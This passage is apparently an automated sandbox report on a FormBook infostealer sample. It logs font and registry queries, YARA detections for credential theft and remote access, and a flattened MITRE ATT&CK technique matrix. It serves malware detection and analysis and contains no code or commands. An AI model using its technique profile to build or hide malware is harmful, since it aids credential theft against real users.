          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.TU0kiz3mxz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.TU0kiz3mxz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.TU0kiz3mxz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.TU0kiz3mxz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Command and Scripting Interpreter          		1
          DLL Side-Loading          		512
          Process Injection          		1
          Masquerading          		OS Credential Dumping341
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts1
          Abuse Elevation Control Mechanism          		1
          Disable or Modify Tools          		LSASS Memory2
          Process Discovery          		Remote Desktop ProtocolData from Removable Media2
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading          		151
          Virtualization/Sandbox Evasion          		Security Account Manager151
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook512
          Process Injection          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          File and Directory Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Abuse Elevation Control Mechanism          		Cached Domain Credentials212
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
          Obfuscated Files or Information          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
          Software Packing          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Timestomp          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
          DLL Side-Loading          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
